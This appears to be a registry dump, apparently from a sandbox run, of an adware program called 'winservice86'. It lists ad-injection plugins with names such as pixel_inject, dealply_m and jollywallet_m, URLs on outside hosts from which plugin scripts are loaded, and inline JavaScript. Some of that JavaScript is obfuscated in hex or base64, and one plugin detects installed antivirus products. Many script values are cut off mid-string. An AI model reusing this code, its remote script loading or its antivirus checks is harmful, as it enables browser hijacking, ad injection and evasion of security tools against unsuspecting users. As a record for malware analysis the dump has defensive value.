    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "Name" = "Corporate Inc"

    [HKCU\Software\winservice86\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi"

    [HKCU\Software\winservice86\Plugins\275]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/275.js"

    [HKCU\Software\winservice86\Plugins\41]
    "Version" = "7"

    [HKCU\Software\winservice86\Plugins\220]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/220.js"

    [HKCU\Software\winservice86\Plugins\424]
    "Version" = "3"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\winservice86\Plugins\262]
    "Version" = "2"

    [HKCU\Software\winservice86\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\winservice86\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\winservice86\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\winservice86\Plugins\390]
    "Name" = "50pops_new_m"

    [HKCU\Software\winservice86\Plugins\339]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-矨"

    [HKCU\Software\winservice86\Manifest]
    "Version" = "43"
    "Description" = "winservice"

    [HKCU\Software\winservice86\Plugins\94]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/94.js"

    [HKCU\Software\winservice86\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI."

    [HKCU\Software\winservice86\Plugins\43]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/43.js"

    [HKCU\Software\winservice86\Plugins\246]
    "JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""

    [HKCU\Software\winservice86\Plugins\180]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/180.js"

    [HKCU\Software\winservice86\Plugins\391]
    "Version" = "1"

    [HKCU\Software\winservice86\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\winservice86\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\winservice86\Installer]
    "DefaultBrowser" = "ie"
    "osName" = "XP32"

    [HKLM\SOFTWARE\Tempo]
    "(Default)" = "tempo"

    [HKCU\Software\winservice86\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\winservice86\Plugins\91]
    "Version" = "87"

    [HKCU\Software\winservice86\Plugins\253]
    "Name" = "pixel_inject"

    [HKCU\Software\winservice86\Manifest]
    "Name" = "winservice86"

    [HKCU\Software\winservice86\Plugins\45]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/45.js"

    [HKCU\Software\winservice86\Plugins\424]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY1MzBiMWUwMjFiMjUxMTFhNGM1NzUzMGIxZTAyMWI0YTRjNTkxZDVlNWYwMjA3MTcxMTFmMGQxNzE5MWU1ZjAwMDUxYjQ0MTUxYjAyNWY0MzA2MDYwODA1MDQxYzBlMTkwMDQzMTIwYzA3NTkxYzAzM2MxOTBjMGIyZTBiMDcyOTE4MDMwMTI5NDAwNzAyNWMwOTE3MDYwMDAyMWYwOTAzMzgwNzU3MjkzNDMzMzEzOTNkM2UyMzJhMmUzMzM5MmYyMDM3MjMzZDJlMmEyZTI5MzQ1NjAwMTkxYjAzMDUxMTEzMzUwNDE0MDY0YjMxMzIzMjMxMjUyNTM4MjIyYTMyMmIzZjJlMjAyNTIzMjUyNDMxMmYzMTJlM2UyNzJmMjkzNDU2MGExODFkMTkxMDBmMDYxNzFmMTkwYzE4M2EwNDFjMDY1NzI5MzQzMzMxMzkzZDNlMjMyYTJlMzMzOTJmMmEzODNkMzkzMDJmMjYyOTNmMzkyZTMzMzEzMjU3MDIxYTA2MjIzNDVlMjkzMTJlMjMyYzM5MjUzOTM5MjczMzNjMzIzMDMzM2EyOTIyMzQzYzI5NDgyNDMzMmEyOTRiMzQyZjIwMjQyMTNlMjIzMTIzMzIyZTIyM2MzZjIwM2UyNTIyMjYzYTJlMjIzYzIzM2QyODIzM2MyMzMyMzQyZjQ1MTcxZTFkM2YwMjA3MTM1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmYzZDIxM2MyNDM3MjYzNTNjMjk0ODFlMDQwMTIzMzI1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmIzNTI1MjYyNDMyMmUzNDNjMjUzYjJmMmUyYTJlMjkzNDUyNGY1NDA2MTkwNTEzMTkyMzE5MWM0MTRjNGMwNTA1MTcxYTA1NTE1ZjRjMDU1ZDQzMTAwZTBiMGMwNDFlMDIwMTFkNDMxMjBjMDc1OTBlMDgx"

    [HKCU\Software\Crossrider]
    "Verifier" = "1a7df627a5d721883af6cb9355d58bf1"

    [HKCU\Software\winservice86\Plugins\200]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM2ZDZhNGUxMTAyMWUxZjI0MWYxYjQ1NTk0YzViMWUxZTFiMDE1NzU4NDgxMTE5MTUxMzE5NDEwMjA0MWEwZTBmMGQwYjEyMGYwZTFkMWU1OTA5MDYxODU2MDA1YjQxNDE0MjAwMGYwYTE4MWMxYTAzMWMwNTQyNDY1NzU0NWM1NjI5MzUyYzIzMjIyNDM0MzEyNTNkMzMzODMwMzQzNTIzMjIyZDI4M2MzMjM1M2MyNDJmMjgyZTI3MzMyNjU5MzUzMDM1MjIzYTI2MmEyMjI2Mjk1NTFmMTAxZjAzMDkwNjFlMzcxNzA3MGE0YzMyMjgyNDMxMjMyYTI1MzgyNjM1MjgyNTM4MjIzYzI5MjkyNDJlM2MyODI4Mzg0MTQwNzM3ZjQ4MDcwNTE5MDcxNDM2MWUxNTU0NTA0ZjUzMDUwMzEzMTMxZjQzNTk0NTFkMDQwMTEyMTQ0ZDFmMTAxYjAzMDMxMDFmMTMwMjAyMDAwYTU4MDQwYTA1NDIwMTU2NGQ1YzU2MDEwMjA2MDUwODFiMGUxMDE4NTY0NzVhNTg0MTQyMjgzODIwM2UzNjI1MzkzZDM4MjkzMjM1M2MyOTIxMjIyZjIxMzUyODMzMzgzMDM5M2IyOTIzMmIyZTMyNTgzODNjMjgzNjNiMmIyNjNmMzIyODU4MTMwZDBiMDIwNDBhMDMyMzE2MGEwNjUxMjYyOTI5M2QzZTNlMjQzNTJhMjgzYzI0MzUyZTIxM2QyODI5MjIyMTNjMjkzNTRkNWQ2NzdlNDUxMzAwMGMxMTAzMDEzODA5NTU1ZDQzNWU0OTQ2NjAxMg==', 'wgclyvjoqm'); }"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppPath" = "%Program Files%\winservice86"

    [HKCU\Software\winservice86\Plugins\339]
    "URL" = "http://js.newcloudrack.com/plugins/mins/339.js"

    [HKCU\Software\winservice86\Plugins\78]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/78.js"

    [HKCU\Software\winservice86\Plugins\380]
    "Version" = "1"

    [HKCU\Software\winservice86\Plugins\273]
    "Name" = "aedgency_back_button_m"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\winservice86\Plugins\230]
    "Version" = "7"

    [HKLM\SOFTWARE\winservice86\Installer]
    "BundledIe" = "1"

    [HKCU\Software\winservice86\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\winservice86\Plugins\345]
    "Version" = "47"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "DisplayName" = "winservice86"

    [HKCU\Software\winservice86\Plugins\184]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/184.js"

    [HKCU\Software\winservice86\Plugins\17]
    "Name" = "jQuery"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "Verifier" = "1a7df627a5d721883af6cb9355d58bf1"

    [HKCU\Software\winservice86\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"

    [HKCU\Software\winservice86\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\winservice86\Plugins\2]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\184]
    "Version" = "10"

    [HKLM\SOFTWARE\winservice86\Installer]
    "BundledAddCh" = "1"

    [HKCU\Software\winservice86\Plugins\38]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/38.js"

    [HKCU\Software\winservice86\Plugins\339]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMDQxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYw"

    [HKCU\Software\winservice86\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\winservice86\Plugins\40]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/40.js"

    [HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
    "AuCheckPeriodMs" = "21600000"

    [HKCU\Software\winservice86\Plugins\9]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\winservice86\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActic"

    [HKCU\Software\winservice86\Plugins\345]
    "URL" = "http://js.newcloudrack.com/plugins/mins/345.js"

    [HKCU\Software\winservice86\Plugins\78]
    "Version" = "5"

    [HKCU\Software\winservice86\Plugins\93]
    "Version" = "13"

    [HKCU\Software\winservice86\Plugins\230]
    "Name" = "revizer_ws_dynamic_b2b_2_m"

    [HKCU\Software\winservice86\Plugins\195]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/195.js"

    [HKCU\Software\winservice86\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"

    [HKCU\Software\winservice86\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\winservice86\Plugins\128]
    "Version" = "7"

    [HKCU\Software\winservice86\Installer]
    "AdditionalInfo" = "{""asw"":[0, 1073750528, 0],""browser_name"":""ie""

    [HKCU\Software\winservice86\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\winservice86\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\winservice86\Plugins\390]
    "URL" = "http://js.newcloudrack.com/plugins/mins/390.js"

    [HKCU\Software\winservice86\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\winservice86\Plugins\42]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/42.js"

    [HKCU\Software\winservice86\Plugins\14]
    "Version" = "11"

    [HKCU\Software\winservice86\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\winservice86\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\winservice86\Plugins\39]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/39.js"

    [HKCU\Software\winservice86\Plugins\289]
    "Name" = "covus_logos_m"

    [HKCU\Software\winservice86\Plugins\354]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(function(){var u={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"

    [HKCU\Software\winservice86\Manifest]
    "PublisherName" = "Corporate Inc"
    "Manifest" = "NA"
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\winservice86\Plugins\390]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }"

    [HKCU\Software\winservice86\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\winservice86\Plugins\376]
    "URL" = "http://js.newcloudrack.com/plugins/mins/376.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\winservice86\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\winservice86\Plugins\180]
    "Version" = "12"

    [HKCU\Software\winservice86\Plugins\311]
    "URL" = "http://js.newcloudrack.com/plugins/mins/311.js"

    [HKCU\Software\winservice86\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars1"

    [HKCU\Software\winservice86\Plugins\40]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\289]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){bf"

    [HKCU\Software\winservice86\Plugins\193]
    "Version" = "9"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\winservice86\Plugins\391]
    "URL" = "http://js.newcloudrack.com/plugins/mins/391.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\winservice86\Plugins\380]
    "URL" = "http://js.newcloudrack.com/plugins/mins/380.js"

    [HKCU\Software\winservice86\Plugins\391]
